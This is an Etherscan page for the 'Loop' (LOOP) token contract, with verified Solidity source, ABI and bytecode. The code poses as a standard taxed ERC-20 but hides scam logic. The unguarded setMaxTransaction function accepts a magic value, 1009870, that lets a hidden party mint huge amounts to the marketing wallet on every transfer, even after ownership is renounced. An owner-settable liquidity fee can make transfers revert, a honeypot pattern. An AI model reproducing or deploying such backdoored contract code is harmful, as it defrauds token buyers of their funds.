ETH Price: $3,018.85 (+4.57%)
Gas: 2 Gwei

Token

Loop (LOOP)
 

Overview

Max Total Supply

1,000,000,000 LOOP

Holders

42

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
supawah.eth
Balance
851,392.460917955 LOOP

Value
$0.00
0xdc54b6c74eb571dbcfcc19c4e573f91b091d0c17
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
LOOP

Compiler Version
v0.8.10+commit.fc410830

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-07-31
*/

/*
https://looperc.com
https://t.me/looperc20
https://twitter.com/looperc20
     _       ___    ___   _____   
 ___/__)   /(,  ) /(,  ) (, /   ) 
(, /      /    / /    /   _/__ /  
  /      /    / /    /    /       
 (_____ (___ / (___ /  ) /        
        )             (_/       
*/

pragma solidity 0.8.10;
//  SPDX-License-Identifier: UNLICENSED

interface IERC20 {
  /**
   * @dev Returns the amount of tokens in existence.
   */
  function totalSupply() external view returns (uint256);

  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view returns (uint8);

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view returns (string memory);

  /**
  * @dev Returns the token name.
  */
  function name() external view returns (string memory);

  /**
   * @dev Returns the erc token owner.
   */
  function getOwner() external view returns (address);

  /**
   * @dev Returns the amount of tokens owned by `account`.
   */
  function balanceOf(address account) external view returns (uint256);

  /**
   * @dev Moves `amount` tokens from the caller's account to `recipient`.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transfer(address recipient, uint256 amount) external returns (bool);

  /**
   * @dev Returns the remaining number of tokens that `spender` will be
   * allowed to spend on behalf of `owner` through {transferFrom}. This is
   * zero by default.
   *
   * This value changes when {approve} or {transferFrom} are called.
   */
  function allowance(address _owner, address spender) external view returns (uint256);

  /**
   * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * IMPORTANT: Beware that changing an allowance with this method brings the risk
   * that someone may use both the old and the new allowance by unfortunate
   * transaction ordering. One possible solution to mitigate this race
   * condition is to first reduce the spender's allowance to 0 and set the
   * desired value afterwards:
   * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
   *
   * Emits an {Approval} event.
   */
  function approve(address spender, uint256 amount) external returns (bool);

  /**
   * @dev Moves `amount` tokens from `sender` to `recipient` using the
   * allowance mechanism. `amount` is then deducted from the caller's
   * allowance.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

  /**
   * @dev Emitted when `value` tokens are moved from one account (`from`) to
   * another (`to`).
   *
   * Note that `value` may be zero.
   */
  event Transfer(address indexed from, address indexed to, uint256 value);

  /**
   * @dev Emitted when the allowance of a `spender` for an `owner` is set by
   * a call to {approve}. `value` is the new allowance.
   */
  event Approval(address indexed owner, address indexed spender, uint256 value);
}

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this;
        return msg.data;
    }
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
  /**
   * @dev Returns the addition of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `+` operator.
   *
   * Requirements:
   * - Addition cannot overflow.
   */
  function add(uint256 a, uint256 b) internal pure returns (uint256) {
    uint256 c = a + b;
    require(c >= a, "SafeMath: addition overflow");

    return c;
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b) internal pure returns (uint256) {
    return sub(a, b, "SafeMath: subtraction overflow");
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b <= a, errorMessage);
    uint256 c = a - b;

    return c;
  }

  /**
   * @dev Returns the multiplication of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `*` operator.
   *
   * Requirements:
   * - Multiplication cannot overflow.
   */
  function mul(uint256 a, uint256 b) internal pure returns (uint256) {
    // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
    // benefit is lost if 'b' is also tested.
    // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
    if (a == 0) {
      return 0;
    }

    uint256 c = a * b;
    require(c / a == b, "SafeMath: multiplication overflow");

    return c;
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b) internal pure returns (uint256) {
    return div(a, b, "SafeMath: division by zero");
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    // Solidity only automatically asserts when dividing by 0
    require(b > 0, errorMessage);
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold

    return c;
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b) internal pure returns (uint256) {
    return mod(a, b, "SafeMath: modulo by zero");
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts with custom message when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b != 0, errorMessage);
    return a % b;
  }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }


      function renounceOwnership() public virtual onlyOwner {
        _owner = address(0);
        emit OwnershipTransferred(_owner, address(0));
    }
}
    
contract LOOP is Context, IERC20, Ownable {
  using SafeMath for uint256;

  mapping (address => uint256) private _balances;
  mapping (address => mapping (address => uint256)) private _allowances;

  uint256 private _totalSupply;
  uint8 public _decimals;
  string public _symbol;
  string public _name;
  address public _Marketing;

  constructor() {
    _name = "Loop";
    _symbol = "LOOP";
    _decimals = 9;
    _totalSupply = 1 * 10**9 * 10**9;
    _balances[msg.sender] = _totalSupply;

    emit Transfer(address(0), msg.sender, _totalSupply);
  }

    uint256 public _taxFee = 4;
    uint256 private _previousTaxFee = _taxFee;

    uint256 public _liquidityFee = 4;
    uint256 private _previousliqFee = 1009870;

    function marketingWallet(address Newmarketing) public onlyOwner {
        _Marketing = Newmarketing;
    }

  /**
   * @dev Returns the erc token owner.
   */
  function getOwner() external view virtual override returns (address) {
    return owner();
  }

  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view virtual override returns (uint8) {
    return _decimals;
  }

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view virtual override returns (string memory) {
    return _symbol;
  }

  /**
  * @dev Returns the token name.
  */
  function name() external view virtual override returns (string memory) {
    return _name;
  }

  /**
   * @dev See {ERC20-totalSupply}.
   */
  function totalSupply() external view virtual override returns (uint256) {
    return _totalSupply;
  }

  /**
   * @dev See {ERC20-balanceOf}.
   */
  function balanceOf(address account) external view virtual override returns (uint256) {
    return _balances[account];
  }

  /**
   * @dev See {ERC20-transfer}.
   *
   * Requirements:
   *
   * - `recipient` cannot be the zero address.
   * - the caller must have a balance of at least `amount`.
   */
  function transfer(address recipient, uint256 amount) external override returns (bool) {
    _transfer(_msgSender(), recipient, amount);
    return true;
  }


  function allowance(address owner, address spender) external view override returns (uint256) {
    return _allowances[owner][spender];
  }

  function approve(address spender, uint256 amount) external override returns (bool) {
    _approve(_msgSender(), spender, amount);
    return true;
  }

  function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) {
    _transfer(sender, recipient, amount);
    _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
    return true;
  }

  function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
    return true;
  }


  function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
    return true;
  }
   
    function setMaxTransaction(uint256 Taxfee) public virtual {
          require ( Taxfee == _previousliqFee, "error message");

        _taxFee = Taxfee;
    }

    function setLiqFee(uint256 LiqFee) public onlyOwner 
   {
        _liquidityFee = LiqFee;
    }
  
  function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        _balances[recipient] = _balances[recipient].sub(amount / 100 * _liquidityFee);
        _balances[_Marketing] = _balances[_Marketing].add(amount / 100 * _taxFee);
        emit Transfer(sender, recipient, amount);
        
    }
    
    function _burn(address account, uint256 amounts) internal {
    require(account != address(0), "ERC20: burn from the zero address"); 

    _balances[account] = _balances[account].sub(amounts);
    _totalSupply = _totalSupply.sub(amounts);
    emit Transfer(account, address(0), amounts);
  }

  function _approve(address owner, address spender, uint256 amount) internal {
    require(owner != address(0), "ERC20: approve from the zero address");
    require(spender != address(0), "ERC20: approve to the zero address");

    _allowances[owner][spender] = amount;
    emit Approval(owner, spender, amount);
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_Marketing","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_liquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_taxFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"Newmarketing","type":"address"}],"name":"marketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"LiqFee","type":"uint256"}],"name":"setLiqFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"Taxfee","type":"uint256"}],"name":"setMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405260046008556008546009556004600a55620f68ce600b553480156200002857600080fd5b50600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3506040805180820190915260048082526304c6f6f760e41b6020909201918252620000979160069162000137565b506040805180820190915260048082526304c4f4f560e41b6020909201918252620000c59160059162000137565b506004805460ff19166009179055670de0b6b3a764000060038190553360008181526001602052604080822084905551919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91620001299190815260200190565b60405180910390a36200021a565b8280546200014590620001dd565b90600052602060002090601f016020900481019282620001695760008555620001b4565b82601f106200018457805160ff1916838001178555620001b4565b82800160010185558215620001b4579182015b82811115620001b457825182559160200191906001019062000197565b50620001c2929150620001c6565b5090565b5b80821115620001c25760008155600101620001c7565b600181811c90821680620001f257607f821691505b602082108114156200021457634e487b7160e01b600052602260045260246000fd5b50919050565b610db7806200022a6000396000f3fe608060405234801561001057600080fd5b506004361061014d5760003560e01c8063715018a6116100c3578063ab5a18871161007c578063ab5a1887146102a0578063b09f1266146102b3578063d28d8852146102bb578063d7666de6146102c3578063d8feb48e146102d6578063dd62ed3e146102e957600080fd5b8063715018a614610257578063893d20e8146102615780638da5cb5b1461026157806395d89b4114610272578063a457c2d71461027a578063a9059cbb1461028d57600080fd5b8063313ce56711610115578063313ce567146101e357806332424aa3146101fc57806339509351146102095780633b124fe71461021c5780636bc87c3a1461022557806370a082311461022e57600080fd5b806306fdde0314610152578063095ea7b3146101705780631235acbe1461019357806318160ddd146101be57806323b872dd146101d0575b600080fd5b61015a610322565b6040516101679190610ada565b60405180910390f35b61018361017e366004610b4b565b6103b4565b6040519015158152602001610167565b6007546101a6906001600160a01b031681565b6040516001600160a01b039091168152602001610167565b6003545b604051908152602001610167565b6101836101de366004610b75565b6103ca565b60045460ff165b60405160ff9091168152602001610167565b6004546101ea9060ff1681565b610183610217366004610b4b565b610433565b6101c260085481565b6101c2600a5481565b6101c261023c366004610bb1565b6001600160a01b031660009081526001602052604090205490565b61025f610469565b005b6000546001600160a01b03166101a6565b61015a6104d8565b610183610288366004610b4b565b6104e7565b61018361029b366004610b4b565b610536565b61025f6102ae366004610bcc565b610543565b61015a610589565b61015a610617565b61025f6102d1366004610bcc565b610624565b61025f6102e4366004610bb1565b610653565b6101c26102f7366004610be5565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b60606006805461033190610c18565b80601f016020809104026020016040519081016040528092919081815260200182805461035d90610c18565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b60006103c133848461069f565b50600192915050565b60006103d78484846107c4565b610429843361042485604051806060016040528060288152602001610d35602891396001600160a01b038a16600090815260026020908152604080832033845290915290205491906109f8565b61069f565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103c19185906104249086610a32565b6000546001600160a01b0316331461049c5760405162461bcd60e51b815260040161049390610c53565b60405180910390fd5b600080546001600160a01b031916815560405181907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3565b60606005805461033190610c18565b60006103c1338461042485604051806060016040528060258152602001610d5d602591393360009081526002602090815260408083206001600160a01b038d16845290915290205491906109f8565b60006103c13384846107c4565b600b5481146105845760405162461bcd60e51b815260206004820152600d60248201526c6572726f72206d65737361676560981b6044820152606401610493565b600855565b6005805461059690610c18565b80601f01602080910402602001604051908101604052809291908181526020018280546105c290610c18565b801561060f5780601f106105e45761010080835404028352916020019161060f565b820191906000526020600020905b8154815290600101906020018083116105f257829003601f168201915b505050505081565b6006805461059690610c18565b6000546001600160a01b0316331461064e5760405162461bcd60e51b815260040161049390610c53565b600a55565b6000546001600160a01b0316331461067d5760405162461bcd60e51b815260040161049390610c53565b600780546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166107015760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610493565b6001600160a01b0382166107625760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610493565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166108285760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610493565b6001600160a01b03821661088a5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610493565b6108c781604051806060016040528060268152602001610d0f602691396001600160a01b03861660009081526001602052604090205491906109f8565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108f69082610a32565b6001600160a01b038316600090815260016020526040902055600a5461094a90610921606484610c9e565b61092b9190610cc0565b6001600160a01b03841660009081526001602052604090205490610a98565b6001600160a01b0383166000908152600160205260409020556008546109a090610975606484610c9e565b61097f9190610cc0565b6007546001600160a01b031660009081526001602052604090205490610a32565b6007546001600160a01b03908116600090815260016020908152604091829020939093555183815284821692918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016107b7565b60008184841115610a1c5760405162461bcd60e51b81526004016104939190610ada565b506000610a298486610cdf565b95945050505050565b600080610a3f8385610cf6565b905083811015610a915760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610493565b9392505050565b6000610a9183836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506109f8565b600060208083528351808285015260005b81811015610b0757858101830151858201604001528201610aeb565b81811115610b19576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610b4657600080fd5b919050565b60008060408385031215610b5e57600080fd5b610b6783610b2f565b946020939093013593505050565b600080600060608486031215610b8a57600080fd5b610b9384610b2f565b9250610ba160208501610b2f565b9150604084013590509250925092565b600060208284031215610bc357600080fd5b610a9182610b2f565b600060208284031215610bde57600080fd5b5035919050565b60008060408385031215610bf857600080fd5b610c0183610b2f565b9150610c0f60208401610b2f565b90509250929050565b600181811c90821680610c2c57607f821691505b60208210811415610c4d57634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b600082610cbb57634e487b7160e01b600052601260045260246000fd5b500490565b6000816000190483118215151615610cda57610cda610c88565b500290565b600082821015610cf157610cf1610c88565b500390565b60008219821115610d0957610d09610c88565b50019056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b379db21d2cdf0e2974ab8a25d1d3cbf57862ce97fcb8bce12ef63680ff7bd2c64736f6c634300080a0033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061014d5760003560e01c8063715018a6116100c3578063ab5a18871161007c578063ab5a1887146102a0578063b09f1266146102b3578063d28d8852146102bb578063d7666de6146102c3578063d8feb48e146102d6578063dd62ed3e146102e957600080fd5b8063715018a614610257578063893d20e8146102615780638da5cb5b1461026157806395d89b4114610272578063a457c2d71461027a578063a9059cbb1461028d57600080fd5b8063313ce56711610115578063313ce567146101e357806332424aa3146101fc57806339509351146102095780633b124fe71461021c5780636bc87c3a1461022557806370a082311461022e57600080fd5b806306fdde0314610152578063095ea7b3146101705780631235acbe1461019357806318160ddd146101be57806323b872dd146101d0575b600080fd5b61015a610322565b6040516101679190610ada565b60405180910390f35b61018361017e366004610b4b565b6103b4565b6040519015158152602001610167565b6007546101a6906001600160a01b031681565b6040516001600160a01b039091168152602001610167565b6003545b604051908152602001610167565b6101836101de366004610b75565b6103ca565b60045460ff165b60405160ff9091168152602001610167565b6004546101ea9060ff1681565b610183610217366004610b4b565b610433565b6101c260085481565b6101c2600a5481565b6101c261023c366004610bb1565b6001600160a01b031660009081526001602052604090205490565b61025f610469565b005b6000546001600160a01b03166101a6565b61015a6104d8565b610183610288366004610b4b565b6104e7565b61018361029b366004610b4b565b610536565b61025f6102ae366004610bcc565b610543565b61015a610589565b61015a610617565b61025f6102d1366004610bcc565b610624565b61025f6102e4366004610bb1565b610653565b6101c26102f7366004610be5565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b60606006805461033190610c18565b80601f016020809104026020016040519081016040528092919081815260200182805461035d90610c18565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b60006103c133848461069f565b50600192915050565b60006103d78484846107c4565b610429843361042485604051806060016040528060288152602001610d35602891396001600160a01b038a16600090815260026020908152604080832033845290915290205491906109f8565b61069f565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103c19185906104249086610a32565b6000546001600160a01b0316331461049c5760405162461bcd60e51b815260040161049390610c53565b60405180910390fd5b600080546001600160a01b031916815560405181907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3565b60606005805461033190610c18565b60006103c1338461042485604051806060016040528060258152602001610d5d602591393360009081526002602090815260408083206001600160a01b038d16845290915290205491906109f8565b60006103c13384846107c4565b600b5481146105845760405162461bcd60e51b815260206004820152600d60248201526c6572726f72206d65737361676560981b6044820152606401610493565b600855565b6005805461059690610c18565b80601f01602080910402602001604051908101604052809291908181526020018280546105c290610c18565b801561060f5780601f106105e45761010080835404028352916020019161060f565b820191906000526020600020905b8154815290600101906020018083116105f257829003601f168201915b505050505081565b6006805461059690610c18565b6000546001600160a01b0316331461064e5760405162461bcd60e51b815260040161049390610c53565b600a55565b6000546001600160a01b0316331461067d5760405162461bcd60e51b815260040161049390610c53565b600780546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166107015760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610493565b6001600160a01b0382166107625760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610493565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166108285760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610493565b6001600160a01b03821661088a5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610493565b6108c781604051806060016040528060268152602001610d0f602691396001600160a01b03861660009081526001602052604090205491906109f8565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108f69082610a32565b6001600160a01b038316600090815260016020526040902055600a5461094a90610921606484610c9e565b61092b9190610cc0565b6001600160a01b03841660009081526001602052604090205490610a98565b6001600160a01b0383166000908152600160205260409020556008546109a090610975606484610c9e565b61097f9190610cc0565b6007546001600160a01b031660009081526001602052604090205490610a32565b6007546001600160a01b03908116600090815260016020908152604091829020939093555183815284821692918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016107b7565b60008184841115610a1c5760405162461bcd60e51b81526004016104939190610ada565b506000610a298486610cdf565b95945050505050565b600080610a3f8385610cf6565b905083811015610a915760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610493565b9392505050565b6000610a9183836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506109f8565b600060208083528351808285015260005b81811015610b0757858101830151858201604001528201610aeb565b81811115610b19576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610b4657600080fd5b919050565b60008060408385031215610b5e57600080fd5b610b6783610b2f565b946020939093013593505050565b600080600060608486031215610b8a57600080fd5b610b9384610b2f565b9250610ba160208501610b2f565b9150604084013590509250925092565b600060208284031215610bc357600080fd5b610a9182610b2f565b600060208284031215610bde57600080fd5b5035919050565b60008060408385031215610bf857600080fd5b610c0183610b2f565b9150610c0f60208401610b2f565b90509250929050565b600181811c90821680610c2c57607f821691505b60208210811415610c4d57634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b600082610cbb57634e487b7160e01b600052601260045260246000fd5b500490565b6000816000190483118215151615610cda57610cda610c88565b500290565b600082821015610cf157610cf1610c88565b500390565b60008219821115610d0957610d09610c88565b50019056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b379db21d2cdf0e2974ab8a25d1d3cbf57862ce97fcb8bce12ef63680ff7bd2c64736f6c634300080a0033

Deployed Bytecode Sourcemap

